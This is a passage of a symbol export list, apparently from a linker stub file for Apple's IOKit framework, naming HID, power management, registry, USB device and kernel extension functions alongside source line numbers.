_IOHIDElementGetPhysicalMin, _IOHIDElementGetProperty, 229 | _IOHIDElementGetReportCount, _IOHIDElementGetReportID, 230 | _IOHIDElementGetReportSize, _IOHIDElementGetType, 231 | _IOHIDElementGetTypeID, _IOHIDElementGetUnit, _IOHIDElementGetUnitExponent, 232 | _IOHIDElementGetUsage, _IOHIDElementGetUsagePage, 233 | _IOHIDElementHasNullState, _IOHIDElementHasPreferredState, 234 | _IOHIDElementIsArray, _IOHIDElementIsNonLinear, 235 | _IOHIDElementIsRelative, _IOHIDElementIsVirtual, 236 | _IOHIDElementIsWrapping, _IOHIDElementSetProperty, 237 | _IOHIDEventAppendEvent, _IOHIDEventConformsTo, _IOHIDEventConformsToWithOptions, 238 | _IOHIDEventCreate, _IOHIDEventCreateAccelerometerEvent, 239 | _IOHIDEventCreateAccelerometerEventWithType, _IOHIDEventCreateAmbientLightSensorEvent, 240 | _IOHIDEventCreateAtmosphericPressureEvent, _IOHIDEventCreateBiometricEvent, 241 | _IOHIDEventCreateBoundaryScrollEvent, _IOHIDEventCreateButtonEvent, 242 | _IOHIDEventCreateButtonEventWithPressure, _IOHIDEventCreateCompassEvent, 243 | _IOHIDEventCreateCompassEventWithType, _IOHIDEventCreateCopy, 244 | _IOHIDEventCreateData, _IOHIDEventCreateDigitizerEvent, 245 | _IOHIDEventCreateDigitizerFingerEvent, _IOHIDEventCreateDigitizerFingerEventWithQuality, 246 | _IOHIDEventCreateDigitizerStylusEvent, _IOHIDEventCreateDigitizerStylusEventWithPolarOrientation, 247 | _IOHIDEventCreateDockSwipeEvent, _IOHIDEventCreateFluidTouchGestureEvent, 248 | _IOHIDEventCreateForceEvent, _IOHIDEventCreateGyroEvent, 249 | _IOHIDEventCreateGyroEventWithType, _IOHIDEventCreateKeyboardEvent, 250 | _IOHIDEventCreateLEDEvent, _IOHIDEventCreateMotionActivtyEvent, 251 | _IOHIDEventCreateMotionGestureEvent, _IOHIDEventCreateMouseEvent, 252 | _IOHIDEventCreateNavigationSwipeEvent, _IOHIDEventCreateOrientationEvent, 253 | _IOHIDEventCreatePolarOrientationEvent, _IOHIDEventCreateProgressEvent, 254 | _IOHIDEventCreateProximtyEvent, _IOHIDEventCreateRelativePointerEvent, 255 | _IOHIDEventCreateRotationEvent, _IOHIDEventCreateScaleEvent, 256 | _IOHIDEventCreateScrollEvent, _IOHIDEventCreateSwipeEvent, 257 | _IOHIDEventCreateSymbolicHotKeyEvent, _IOHIDEventCreateTranslationEvent, 258 | _IOHIDEventCreateUnicodeEvent, _IOHIDEventCreateUnicodeEventWithQuality, 259 | _IOHIDEventCreateVelocityEvent, _IOHIDEventCreateVendorDefinedEvent, 260 | _IOHIDEventCreateWithBytes, _IOHIDEventCreateWithData, 261 | _IOHIDEventCreateZoomToggleEvent, _IOHIDEventGetAttributeData, 262 | _IOHIDEventGetAttributeDataLength, _IOHIDEventGetAttributeDataPtr, 263 | _IOHIDEventGetChildren, _IOHIDEventGetDataLength, 264 | _IOHIDEventGetDataValue, _IOHIDEventGetDataValueWithOptions, 265 | _IOHIDEventGetEvent, _IOHIDEventGetEventFlags, _IOHIDEventGetEventWithOptions, 266 | _IOHIDEventGetFloatMultiple, _IOHIDEventGetFloatMultipleWithOptions, 267 | _IOHIDEventGetFloatValue, _IOHIDEventGetFloatValueWithOptions, 268 | _IOHIDEventGetIntegerMultiple, _IOHIDEventGetIntegerMultipleWithOptions, 269 | _IOHIDEventGetIntegerValue, _IOHIDEventGetIntegerValueWithOptions, 270 | _IOHIDEventGetLatency, _IOHIDEventGetParent, _IOHIDEventGetPhase, 271 | _IOHIDEventGetPosition, _IOHIDEventGetPositionWithOptions, 272 | _IOHIDEventGetSenderID, _IOHIDEventGetTimeStamp, 273 | _IOHIDEventGetType, _IOHIDEventGetTypeID, _IOHIDEventGetTypeString, 274 | _IOHIDEventGetVendorDefinedData, _IOHIDEventIsAbsolute, 275 | _IOHIDEventIsRepeat, _IOHIDEventQueueCreate, _IOHIDEventQueueCreateWithVM, 276 | _IOHIDEventQueueDequeueCopy, _IOHIDEventQueueEnqueue, 277 | _IOHIDEventQueueGetMemoryHandle, _IOHIDEventQueueGetNotificationPort, 278 | _IOHIDEventQueueGetTypeID, _IOHIDEventQueueIsActive, 279 | _IOHIDEventQueueSetNotificationPort, _IOHIDEventQueueStart, 280 | _IOHIDEventQueueStop, _IOHIDEventReadBytes, _IOHIDEventRemoveEvent, 281 | _IOHIDEventServerCreate, _IOHIDEventServerGetTypeID, 282 | _IOHIDEventServerScheduleWithDispatchQueue, _IOHIDEventServerUnscheduleFromDispatchQueue, 283 | _IOHIDEventSetAttributeData, _IOHIDEventSetEventFlags, 284 | _IOHIDEventSetFloatMultiple, _IOHIDEventSetFloatMultipleWithOptions, 285 | _IOHIDEventSetFloatValue, _IOHIDEventSetFloatValueWithOptions, 286 | _IOHIDEventSetIntegerMultiple, _IOHIDEventSetIntegerMultipleWithOptions, 287 | _IOHIDEventSetIntegerValue, _IOHIDEventSetIntegerValueWithOptions, 288 | _IOHIDEventSetPhase, _IOHIDEventSetPosition, _IOHIDEventSetPositionWithOptions, 289 | _IOHIDEventSetRepeat, _IOHIDEventSetSenderID, _IOHIDEventSetTimeStamp, 290 | _IOHIDEventSystemClient, _IOHIDEventSystemClientCopyProperty, 291 | _IOHIDEventSystemClientCopyServiceForRegistryID, 292 | _IOHIDEventSystemClientCopyServices, _IOHIDEventSystemClientCreate, 293 | _IOHIDEventSystemClientCreateWithType, _IOHIDEventSystemClientDispatchEvent, 294 | _IOHIDEventSystemClientGetTypeID, _IOHIDEventSystemClientGetTypeString, 295 | _IOHIDEventSystemClientRegisterDeviceMatchingBlock, 296 | _IOHIDEventSystemClientRegisterDeviceMatchingCallback, 297 | _IOHIDEventSystemClientRegisterEventBlock, _IOHIDEventSystemClientRegisterEventCallback, 298 | _IOHIDEventSystemClientRegisterEventFilterBlock, 299 | _IOHIDEventSystemClientRegisterEventFilterBlockWithPriority, 300 | _IOHIDEventSystemClientRegisterEventFilterCallback, 301 | _IOHIDEventSystemClientRegisterEventFilterCallbackWithPriority, 302 | _IOHIDEventSystemClientRegisterPropertyChangedCallback, 303 | _IOHIDEventSystemClientRegisterResetCallback, _IOHIDEventSystemClientRegistryIDConformsTo, 304 | _IOHIDEventSystemClientScheduleWithDispatchQueue, 305 | _IOHIDEventSystemClientScheduleWithRunLoop, _IOHIDEventSystemClientSetMatching, 306 | _IOHIDEventSystemClientSetMatchingMultiple, _IOHIDEventSystemClientSetProperty, 307 | _IOHIDEventSystemClientUnregisterDeviceMatchingBlock, 308 | _IOHIDEventSystemClientUnregisterDeviceMatchingCallback, 309 | _IOHIDEventSystemClientUnregisterEventBlock, _IOHIDEventSystemClientUnregisterEventCallback, 310 | _IOHIDEventSystemClientUnregisterEventFilterBlock, 311 | _IOHIDEventSystemClientUnregisterEventFilterCallback, 312 | _IOHIDEventSystemClientUnregisterPropertyChangedCallback, 313 | _IOHIDEventSystemClientUnregisterResetCallback, 314 | _IOHIDEventSystemClientUnscheduleFromDispatchQueue, 315 | _IOHIDEventSystemClientUnscheduleWithRunLoop, _IOHIDEventSystemClose, 316 | _IOHIDEventSystemConnectionDispatchEvent, _IOHIDEventSystemConnectionGetAttribute, 317 | _IOHIDEventSystemConnectionGetTask, _IOHIDEventSystemConnectionGetType, 318 | _IOHIDEventSystemConnectionGetTypeID, _IOHIDEventSystemConnectionGetTypeString, 319 | _IOHIDEventSystemCopyConnections, _IOHIDEventSystemCopyEvent, 320 | _IOHIDEventSystemCopyMatchingServices, _IOHIDEventSystemCopyService, 321 | _IOHIDEventSystemCopyServices, _IOHIDEventSystemCreate, 322 | _IOHIDEventSystemGetProperty, _IOHIDEventSystemGetTypeID, 323 | _IOHIDEventSystemOpen, _IOHIDEventSystemRegisterConnectionAdditionCallback, 324 | _IOHIDEventSystemRegisterConnectionRemovalCallback, 325 | _IOHIDEventSystemRegisterServicesCallback, _IOHIDEventSystemSetCallback, 326 | _IOHIDEventSystemSetProperty, _IOHIDEventSystemUnregisterConnectionAdditionCallback, 327 | _IOHIDEventSystemUnregisterConnectionRemovalCallback, 328 | _IOHIDEventSystemUnregisterServicesCallback, _IOHIDEventTypeGetName, 329 | _IOHIDGetAccelerationWithKey, _IOHIDGetActivityState, 330 | _IOHIDGetButtonEventNum, _IOHIDGetModifierLockState, 331 | _IOHIDGetMouseAcceleration, _IOHIDGetMouseButtonMode, 332 | _IOHIDGetParameter, _IOHIDGetScrollAcceleration, 333 | _IOHIDGetStateForSelector, _IOHIDManagerClose, _IOHIDManagerCopyDevices, 334 | _IOHIDManagerCreate, _IOHIDManagerGetProperty, _IOHIDManagerGetTypeID, 335 | _IOHIDManagerOpen, _IOHIDManagerRegisterDeviceMatchingCallback, 336 | _IOHIDManagerRegisterDeviceRemovalCallback, _IOHIDManagerRegisterInputReportCallback, 337 | _IOHIDManagerRegisterInputValueCallback, _IOHIDManagerSaveToPropertyDomain, 338 | _IOHIDManagerScheduleWithRunLoop, _IOHIDManagerSetDeviceMatching, 339 | _IOHIDManagerSetDeviceMatchingMultiple, _IOHIDManagerSetInputValueMatching, 340 | _IOHIDManagerSetInputValueMatchingMultiple, _IOHIDManagerSetProperty, 341 | _IOHIDManagerUnscheduleFromRunLoop, _IOHIDNotificationCreate, 342 | _IOHIDNotificationGetClientCallback, _IOHIDNotificationGetClientRefcon, 343 | _IOHIDNotificationGetClientTarget, _IOHIDNotificationGetOwnerCallback, 344 | _IOHIDNotificationGetOwnerRefcon, _IOHIDNotificationGetOwnerTarget, 345 | _IOHIDNotificationGetTypeID, _IOHIDPostEvent, _IOHIDQueueAddElement, 346 | _IOHIDQueueContainsElement, _IOHIDQueueCopyNextValue, 347 | _IOHIDQueueCopyNextValueWithTimeout, _IOHIDQueueCreate, 348 | _IOHIDQueueGetDepth, _IOHIDQueueGetDevice, _IOHIDQueueGetTypeID, 349 | _IOHIDQueueRegisterValueAvailableCallback, _IOHIDQueueRemoveElement, 350 | _IOHIDQueueScheduleWithRunLoop, _IOHIDQueueSetDepth, 351 | _IOHIDQueueStart, _IOHIDQueueStop, _IOHIDQueueUnscheduleFromRunLoop, 352 | _IOHIDRegisterVirtualDisplay, _IOHIDServiceClientConformsTo, 353 | _IOHIDServiceClientCopyEvent, _IOHIDServiceClientCopyProperty, 354 | _IOHIDServiceClientGetRegistryID, _IOHIDServiceClientGetTypeID, 355 | _IOHIDServiceClientRegisterRemovalBlock, _IOHIDServiceClientRegisterRemovalCallback, 356 | _IOHIDServiceClientSetElementValue, _IOHIDServiceClientSetProperty, 357 | _IOHIDServiceConformsTo, _IOHIDServiceConnectionCacheContainsKey, 358 | _IOHIDServiceConnectionCacheCopyValueForKey, _IOHIDServiceConnectionCacheCreate, 359 | _IOHIDServiceConnectionCacheGetReportDeadline, _IOHIDServiceConnectionCacheGetTypeID, 360 | _IOHIDServiceConnectionCacheGetUnresponsiveness, 361 | _IOHIDServiceConnectionCacheSetReportDeadline, _IOHIDServiceConnectionCacheSetUnresponsiveness, 362 | _IOHIDServiceConnectionCacheSetValueForKey, _IOHIDServiceCopyEvent, 363 | _IOHIDServiceCopyProperty, _IOHIDServiceCreatePropertyChangedNotification, 364 | _IOHIDServiceCreateRemovalNotification, _IOHIDServiceFilterClose, 365 | _IOHIDServiceFilterCopyPropertyForClient, _IOHIDServiceFilterCreate, 366 | _IOHIDServiceFilterFilterCopyEvent, _IOHIDServiceFilterFilterEvent, 367 | _IOHIDServiceFilterGetType, _IOHIDServiceFilterGetTypeID, 368 | _IOHIDServiceFilterMatch, _IOHIDServiceFilterOpen, 369 | _IOHIDServiceFilterSchedule, _IOHIDServiceFilterSetEventCallback, 370 | _IOHIDServiceFilterSetOutputEvent, _IOHIDServiceFilterSetPropertyForClient, 371 | _IOHIDServiceFilterUnschedule, _IOHIDServiceGetProperty, 372 | _IOHIDServiceGetRegistryID, _IOHIDServiceGetTypeID, 373 | _IOHIDServiceMatchPropertyTable, _IOHIDServiceSetElementValue, 374 | _IOHIDServiceSetOutputEvent, _IOHIDServiceSetProperty, 375 | _IOHIDSessionAddService, _IOHIDSessionClose, _IOHIDSessionCopyEvent, 376 | _IOHIDSessionCreate, _IOHIDSessionFilterClose, _IOHIDSessionFilterCopyEvent, 377 | _IOHIDSessionFilterCreate, _IOHIDSessionFilterFilterCopyEvent, 378 | _IOHIDSessionFilterFilterEvent, _IOHIDSessionFilterGetPropertyForClient, 379 | _IOHIDSessionFilterGetType, _IOHIDSessionFilterGetTypeID, 380 | _IOHIDSessionFilterOpen, _IOHIDSessionFilterRegisterService, 381 | _IOHIDSessionFilterScheduleWithDispatchQueue, _IOHIDSessionFilterSetPropertyForClient, 382 | _IOHIDSessionFilterUnregisterService, _IOHIDSessionFilterUnscheduleFromDispatchQueue, 383 | _IOHIDSessionGetProperty, _IOHIDSessionGetTypeID, 384 | _IOHIDSessionOpen, _IOHIDSessionRemoveService, _IOHIDSessionSetProperty, 385 | _IOHIDSetAccelerationWithKey, _IOHIDSetCFTypeParameter, 386 | _IOHIDSetCursorBounds, _IOHIDSetCursorEnable, _IOHIDSetEventsEnable, 387 | _IOHIDSetFixedMouseLocation, _IOHIDSetModifierLockState, 388 | _IOHIDSetMouseAcceleration, _IOHIDSetMouseButtonMode, 389 | _IOHIDSetMouseLocation, _IOHIDSetOnScreenCursorBounds, 390 | _IOHIDSetParameter, _IOHIDSetScrollAcceleration, 391 | _IOHIDSetStateForSelector, _IOHIDSetVirtualDisplayBounds, 392 | _IOHIDTransactionAddElement, _IOHIDTransactionClear, 393 | _IOHIDTransactionCommit, _IOHIDTransactionCommitWithCallback, 394 | _IOHIDTransactionContainsElement, _IOHIDTransactionCreate, 395 | _IOHIDTransactionGetDevice, _IOHIDTransactionGetDirection, 396 | _IOHIDTransactionGetTypeID, _IOHIDTransactionGetValue, 397 | _IOHIDTransactionRemoveElement, _IOHIDTransactionScheduleWithRunLoop, 398 | _IOHIDTransactionSetDirection, _IOHIDTransactionSetValue, 399 | _IOHIDTransactionUnscheduleFromRunLoop, _IOHIDUnregisterVirtualDisplay, 400 | _IOHIDUserDeviceCreate, _IOHIDUserDeviceCreateWithOptions, 401 | _IOHIDUserDeviceGetTypeID, _IOHIDUserDeviceHandleReport, 402 | _IOHIDUserDeviceHandleReportAsync, _IOHIDUserDeviceHandleReportAsyncWithTimeStamp, 403 | _IOHIDUserDeviceHandleReportWithTimeStamp, _IOHIDUserDeviceRegisterGetReportCallback, 404 | _IOHIDUserDeviceRegisterGetReportWithReturnLengthCallback, 405 | _IOHIDUserDeviceRegisterSetReportCallback, _IOHIDUserDeviceScheduleWithDispatchQueue, 406 | _IOHIDUserDeviceScheduleWithRunLoop, _IOHIDUserDeviceUnscheduleFromDispatchQueue, 407 | _IOHIDUserDeviceUnscheduleFromRunLoop, _IOHIDValueCreateWithBytes, 408 | _IOHIDValueCreateWithBytesNoCopy, _IOHIDValueCreateWithIntegerValue, 409 | _IOHIDValueGetBytePtr, _IOHIDValueGetElement, _IOHIDValueGetIntegerValue, 410 | _IOHIDValueGetLength, _IOHIDValueGetScaledValue, 411 | _IOHIDValueGetTimeStamp, _IOHIDValueGetTypeID, _IOInitContainerClasses, 412 | _IOIteratorIsValid, _IOIteratorNext, _IOIteratorReset, 413 | _IOKitGetBusyState, _IOKitWaitQuiet, _IOMIGMachPortCacheAdd, 414 | _IOMIGMachPortCacheCopy, _IOMIGMachPortCacheRemove, 415 | _IOMIGMachPortCreate, _IOMIGMachPortGetPort, _IOMIGMachPortGetTypeID, 416 | _IOMIGMachPortRegisterDemuxCallback, _IOMIGMachPortRegisterTerminationCallback, 417 | _IOMIGMachPortScheduleWithDispatchQueue, _IOMIGMachPortScheduleWithRunLoop, 418 | _IOMIGMachPortUnscheduleFromDispatchQueue, _IOMIGMachPortUnscheduleFromRunLoop, 419 | _IOMasterPort, _IONetworkClose, _IONetworkGetDataCapacity, 420 | _IONetworkGetDataHandle, _IONetworkGetPacketFiltersMask, 421 | _IONetworkOpen, _IONetworkReadData, _IONetworkResetData, 422 | _IONetworkSetPacketFiltersMask, _IONetworkWriteData, 423 | _IONotificationPortCreate, _IONotificationPortDestroy, 424 | _IONotificationPortGetMachPort, _IONotificationPortGetRunLoopSource, 425 | _IONotificationPortSetDispatchQueue, _IOObjectConformsTo, 426 | _IOObjectCopyBundleIdentifierForClass, _IOObjectCopyClass, 427 | _IOObjectCopySuperclassForClass, _IOObjectGetClass, 428 | _IOObjectGetKernelRetainCount, _IOObjectGetRetainCount, 429 | _IOObjectGetUserRetainCount, _IOObjectIsEqualTo, 430 | _IOObjectRelease, _IOObjectRetain, _IOOpenConnection, 431 | _IOOpenFirmwarePathMatching, _IOPMActivateSystemPowerSettings, 432 | _IOPMAllowsBackgroundTask, _IOPMAllowsPushServiceTask, 433 | _IOPMAssertionCopyProperties, _IOPMAssertionCreate, 434 | _IOPMAssertionCreateWithDescription, _IOPMAssertionCreateWithName, 435 | _IOPMAssertionCreateWithProperties, _IOPMAssertionDeclareNotificationEvent, 436 | _IOPMAssertionDeclareSystemActivity, _IOPMAssertionDeclareUserActivity, 437 | _IOPMAssertionNotify, _IOPMAssertionRelease, _IOPMAssertionRetain, 438 | _IOPMAssertionSetBTCollection, _IOPMAssertionSetProperty, 439 | _IOPMAssertionSetTimeout, _IOPMCancelAllRepeatingPowerEvents, 440 | _IOPMCancelAllScheduledPowerEvents, _IOPMCancelScheduledPowerEvent, 441 | _IOPMChangeSystemActivityAssertionBehavior, _IOPMClaimSystemWakeEvent, 442 | _IOPMConnectionAcknowledgeEvent, _IOPMConnectionAcknowledgeEventWithOptions, 443 | _IOPMConnectionCreate, _IOPMConnectionGetSystemCapabilities, 444 | _IOPMConnectionRelease, _IOPMConnectionScheduleWithRunLoop, 445 | _IOPMConnectionSetDispatchQueue, _IOPMConnectionSetNotification, 446 | _IOPMConnectionUnscheduleFromRunLoop, _IOPMCopyActivePMPreferences, 447 | _IOPMCopyActivePowerProfiles, _IOPMCopyAssertionActivityAggregate, 448 | _IOPMCopyAssertionActivityAggregateWithAllocator, 449 | _IOPMCopyAssertionActivityLog, _IOPMCopyAssertionActivityLogWithAllocator, 450 | _IOPMCopyAssertionActivityUpdate, _IOPMCopyAssertionActivityUpdateWithAllocator, 451 | _IOPMCopyAssertionsByProcess, _IOPMCopyAssertionsByProcessWithAllocator, 452 | _IOPMCopyAssertionsByType, _IOPMCopyAssertionsStatus, 453 | _IOPMCopyBatteryInfo, _IOPMCopyCPUPowerStatus, _IOPMCopyConnectionStatus, 454 | _IOPMCopyCustomPMPreferences, _IOPMCopyHIDPostEventHistory, 455 | _IOPMCopyPMPreferences, _IOPMCopyPowerHistory, _IOPMCopyPowerHistoryDetailed, 456 | _IOPMCopyPowerProfiles, _IOPMCopyPowerStateInfo, 457 | _IOPMCopyRepeatingPowerEvents, _IOPMCopyScheduledPowerEvents, 458 | _IOPMCopySleepPreventersList, _IOPMCopySleepWakeFailure, 459 | _IOPMCopySystemPowerSettings, _IOPMCopyUPSShutdownLevels, 460 | _IOPMCopyUnabridgedActivePMPreferences, _IOPMCopyUserActivityLevelDescription, 461 | _IOPMCtlAssertionType, _IOPMDebugTracePoint, _IOPMDeclareNetworkClientActivity, 462 | _IOPMFeatureIsAvailable, _IOPMFeatureIsAvailableWithSupportedTable, 463 | _IOPMFindPowerManagement, _IOPMGetActivePushConnectionState, 464 | _IOPMGetAggressiveness, _IOPMGetCapabilitiesDescription, 465 | _IOPMGetDarkWakeThermalEmergencyCount, _IOPMGetLastWakeTime, 466 | _IOPMGetPerformanceWarningLevel, _IOPMGetSleepServicesActive, 467 | _IOPMGetThermalWarningLevel, _IOPMGetUUID, _IOPMGetUserActivityLevel, 468 | _IOPMGetValueInt, _IOPMIsADarkWake, _IOPMIsASilentWake, 469 | _IOPMIsASleep, _IOPMIsAUserWake, _IOPMOverrideDefaultPMPreferences, 470 | _IOPMPerformBlockWithAssertion, _IOPMPrefsNotificationCreateRunLoopSource, 471 | _IOPMRequestSysWake, _IOPMRevertPMPreferences, _IOPMSchedulePowerEvent, 472 | _IOPMScheduleRepeatingPowerEvent, _IOPMScheduleUserActiveChangedNotification, 473 | _IOPMScheduleUserActivityLevelNotification, _IOPMSetActivePowerProfiles, 474 | _IOPMSetActivePushConnectionState, _IOPMSetAggressiveness, 475 | _IOPMSetAssertionActivityAggregate, _IOPMSetAssertionActivityLog, 476 | _IOPMSetBTWakeInterval, _IOPMSetCustomPMPreferences, 477 | _IOPMSetDWLingerInterval, _IOPMSetDebugFlags, _IOPMSetPMPreferences, 478 | _IOPMSetReservePowerMode, _IOPMSetSleepServicesWakeTimeCap, 479 | _IOPMSetSystemPowerSetting, _IOPMSetUPSShutdownLevels, 480 | _IOPMSetValueInt, _IOPMSleepEnabled, _IOPMSleepSystem, 481 | _IOPMSleepSystemWithOptions, _IOPMSleepWakeCopyUUID, 482 | _IOPMSleepWakeSetUUID, _IOPMUnregisterNotification, 483 | _IOPMUserDidChangeCallback, _IOPMUserIsActive, _IOPSAccCreateAttachNotification, 484 | _IOPSAccCreateLimitedPowerNotification, _IOPSAccNotificationCreateRunLoopSource, 485 | _IOPSCopyChargeLog, _IOPSCopyExternalPowerAdapterDetails, 486 | _IOPSCopyInternalBatteriesArray, _IOPSCopyPowerSourcesByType, 487 | _IOPSCopyPowerSourcesInfo, _IOPSCopyPowerSourcesList, 488 | _IOPSCopyUPSArray, _IOPSCreateLimitedPowerNotification, 489 | _IOPSCreatePowerSource, _IOPSDrawingUnlimitedPower, 490 | _IOPSGetActiveBattery, _IOPSGetActiveUPS, _IOPSGetBatteryWarningLevel, 491 | _IOPSGetPercentRemaining, _IOPSGetPowerSourceDescription, 492 | _IOPSGetProvidingPowerSourceType, _IOPSGetSupportedPowerSources, 493 | _IOPSGetTimeRemainingEstimate, _IOPSNotificationCreateRunLoopSource, 494 | _IOPSPowerSourceSupported, _IOPSReleasePowerSource, 495 | _IOPSRequestBatteryUpdate, _IOPSSetPowerSourceDetails, 496 | _IORegisterApp, _IORegisterClient, _IORegisterForSystemPower, 497 | _IORegistryCreateEnumerator, _IORegistryCreateIterator, 498 | _IORegistryDisposeEnumerator, _IORegistryEntryCopyFromPath, 499 | _IORegistryEntryCopyPath, _IORegistryEntryCreateCFProperties, 500 | _IORegistryEntryCreateCFProperty, _IORegistryEntryCreateIterator, 501 | _IORegistryEntryFromPath, _IORegistryEntryGetChildEntry, 502 | _IORegistryEntryGetChildIterator, _IORegistryEntryGetLocationInPlane, 503 | _IORegistryEntryGetName, _IORegistryEntryGetNameInPlane, 504 | _IORegistryEntryGetParentEntry, _IORegistryEntryGetParentIterator, 505 | _IORegistryEntryGetPath, _IORegistryEntryGetProperty, 506 | _IORegistryEntryGetRegistryEntryID, _IORegistryEntryIDMatching, 507 | _IORegistryEntryInPlane, _IORegistryEntrySearchCFProperty, 508 | _IORegistryEntrySetCFProperties, _IORegistryEntrySetCFProperty, 509 | _IORegistryEnumeratorNextConforming, _IORegistryEnumeratorReset, 510 | _IORegistryGetRootEntry, _IORegistryIteratorEnterEntry, 511 | _IORegistryIteratorExitEntry, _IOServiceAddInterestNotification, 512 | _IOServiceAddMatchingNotification, _IOServiceAddNotification, 513 | _IOServiceAuthorize, _IOServiceClose, _IOServiceGetBusyState, 514 | _IOServiceGetBusyStateAndTime, _IOServiceGetMatchingService, 515 | _IOServiceGetMatchingServices, _IOServiceGetState, 516 | _IOServiceMatchPropertyTable, _IOServiceMatching, 517 | _IOServiceNameMatching, _IOServiceOFPathToBSDName, 518 | _IOServiceOpen, _IOServiceOpenAsFileDescriptor, 519 | _IOServiceRequestProbe, _IOServiceWaitQuiet, _IOSetNotificationPort, 520 | _IOURLCreateDataAndPropertiesFromResource, _IOURLCreatePropertyFromResource, 521 | _IOUSBDevicDeviceDescriptionGetTypeID, _IOUSBDeviceControllerCreate, 522 | _IOUSBDeviceControllerCreateDefaultDescription, 523 | _IOUSBDeviceControllerCreateWithService, _IOUSBDeviceControllerForceOffBus, 524 | _IOUSBDeviceControllerGetService, _IOUSBDeviceControllerGetTypeID, 525 | _IOUSBDeviceControllerGoOffAndOnBus, _IOUSBDeviceControllerRegisterArrivalCallback, 526 | _IOUSBDeviceControllerRemoveArrivalCallback, _IOUSBDeviceControllerSendCommand, 527 | _IOUSBDeviceControllerSetDescription, _IOUSBDeviceControllerSetPreferredConfiguration, 528 | _IOUSBDeviceDataCreate, _IOUSBDeviceDataGetBytePtr, 529 | _IOUSBDeviceDataGetCapacity, _IOUSBDeviceDataGetMapToken, 530 | _IOUSBDeviceDataGetTypeID, _IOUSBDeviceDescriptionAppendConfiguration, 531 | _IOUSBDeviceDescriptionAppendConfigurationWithInterface, 532 | _IOUSBDeviceDescriptionAppendConfigurationWithInterfaces, 533 | _IOUSBDeviceDescriptionAppendConfigurationWithoutAttributes, 534 | _IOUSBDeviceDescriptionAppendInterfaceToConfiguration, 535 | _IOUSBDeviceDescriptionAppendInterfacesToConfiguration, 536 | _IOUSBDeviceDescriptionCopyInterfaces, _IOUSBDeviceDescriptionCreate, 537 | _IOUSBDeviceDescriptionCreateFromController, _IOUSBDeviceDescriptionCreateFromControllerWithType, 538 | _IOUSBDeviceDescriptionCreateFromDefaults, _IOUSBDeviceDescriptionCreateFromDefaultsAndController, 539 | _IOUSBDeviceDescriptionCreateWithConfigurationInterfaces, 540 | _IOUSBDeviceDescriptionCreateWithType, _IOUSBDeviceDescriptionGetAllowOverride, 541 | _IOUSBDeviceDescriptionGetClass, _IOUSBDeviceDescriptionGetManufacturerString, 542 | _IOUSBDeviceDescriptionGetMatchingConfiguration, 543 | _IOUSBDeviceDescriptionGetProductID, _IOUSBDeviceDescriptionGetProductString, 544 | _IOUSBDeviceDescriptionGetProtocol, _IOUSBDeviceDescriptionGetSerialString, 545 | _IOUSBDeviceDescriptionGetSubClass, _IOUSBDeviceDescriptionGetVendorID, 546 | _IOUSBDeviceDescriptionGetVersion, _IOUSBDeviceDescriptionRemoveAllConfigurations, 547 | _IOUSBDeviceDescriptionSetAllowOverride, _IOUSBDeviceDescriptionSetClass, 548 | _IOUSBDeviceDescriptionSetProductID, _IOUSBDeviceDescriptionSetProtocol, 549 | _IOUSBDeviceDescriptionSetSerialString, _IOUSBDeviceDescriptionSetSubClass, 550 | _IOUSBDeviceDescriptionSetVendorID, _NXClickTime, 551 | _NXCloseEventStatus, _NXEventSystemInfo, _NXGetClickSpace, 552 | _NXGetKeyMapping, _NXKeyMappingLength, _NXKeyRepeatInterval, 553 | _NXKeyRepeatThreshold, _NXOpenEventStatus, _NXResetKeyboard, 554 | _NXResetMouse, _NXSetClickSpace, _NXSetClickTime, 555 | _NXSetKeyMapping, _NXSetKeyRepeatInterval, _NXSetKeyRepeatThreshold, 556 | _OSGetNotificationFromMessage, _OSKextAuthenticate, 557 | _OSKextAuthenticateDependencies, _OSKextCopyAllDependencies, 558 | _OSKextCopyAllRequestedIdentifiers, _OSKextCopyArchitectures, 559 | _OSKextCopyContainerForPluginKext, _OSKextCopyDeclaredDependencies, 560 | _OSKextCopyDependents, _OSKextCopyDiagnostics, _OSKextCopyExecutableForArchitecture, 561 | _OSKextCopyIndirectDependencies, _OSKextCopyInfoDictionary, 562 | _OSKextCopyKextsWithIdentifier, _OSKextCopyKextsWithIdentifiers, 563 | _OSKextCopyLinkDependencies, _OSKextCopyLoadList, 564 | _OSKextCopyLoadListForKexts, _OSKextCopyLoadedKextInfo, 565 | _OSKextCopyPersonalitiesArray, _OSKextCopyPersonalitiesOfKexts, 566 | _OSKextCopyPlugins, _OSKextCopyResource, _OSKextCopyUUIDForArchitecture, 567 | _OSKextCreate, _OSKextCreateKextsFromMkextData, 568 | _OSKextCreateKextsFromMkextFile, _OSKextCreateKextsFromURL, 569 | _OSKextCreateKextsFromURLs, _OSKextCreateLoadedKextInfo, 570 | _OSKextCreateMkext, _OSKextCreateWithIdentifier, 571 | _OSKextDeclaresExecutable, _OSKextDependenciesAreLoadableInSafeBoot, 572 | _OSKextDependsOnKext, _OSKextFilterRequiredKexts, 573 | _OSKextFindLinkDependencies, _OSKextFlushDependencies, 574 | _OSKextFlushDiagnostics, _OSKextFlushInfoDictionary, 575 | _OSKextFlushLoadInfo, _OSKextGetActualSafeBoot, 576 | _OSKextGetAllKexts, _OSKextGetArchitecture, _OSKextGetCompatibleKextWithIdentifier, 577 | _OSKextGetCompatibleVersion, _OSKextGetIdentifier, 578 | _OSKextGetKextWithIdentifier, _OSKextGetKextWithIdentifierAndVersion, 579 | _OSKextGetKextWithURL, _OSKextGetLoadAddress, _OSKextGetLoadTag, 580 | _OSKextGetLoadedKextWithIdentifier, _OSKextGetLogFilter, 581 | _OSKextGetRecordsDiagnostics, _OSKextGetRunningKernelArchitecture, 582 | _OSKextGetSimulatedSafeBoot, _OSKextGetSystemExtensionsFolderURLs, 583 | _OSKextGetTypeID, _OSKextGetURL, _OSKextGetUsesCaches, 584 | _OSKextGetValueForInfoDictionaryKey, _OSKextGetVersion, 585 | _OSKextHasLogOrDebugFlags, _OSKextIsAuthentic, _OSKextIsCompatibleWithVersion, 586 | _OSKextIsFromMkext, _OSKextIsInterface, _OSKextIsKernelComponent, 587 | _OSKextIsLibrary, _OSKextIsLoadable, _OSKextIsLoadableInSafeBoot, 588 | _OSKextIsLoaded, _OSKextIsLoggingEnabled, _OSKextIsPlugin, 589 | _OSKextIsStarted, _OSKextIsValid, _OSKextLoad, _OSKextLoadWithOptions, 590 | _OSKextLog, _OSKextLogCFString, _OSKextLogDependencyGraph, 591 | _OSKextLogDiagnostics, _OSKextMatchesRequiredFlags, 592 | _OSKextOtherVersionIsLoaded, 